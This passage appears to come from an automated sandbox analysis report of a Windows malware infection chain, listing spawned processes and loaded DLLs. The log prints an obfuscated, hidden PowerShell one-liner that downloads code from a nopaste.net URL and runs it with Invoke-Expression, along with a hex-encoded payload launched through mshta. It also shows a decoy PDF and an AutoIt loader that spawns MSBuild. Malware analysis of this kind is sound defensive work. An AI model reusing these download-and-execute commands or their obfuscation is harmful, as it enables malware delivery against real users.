D15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1648,i,15822098111641296172,2076974051186790361,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll Jump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3xJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1648,i,15822098111641296172,2076974051186790361,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
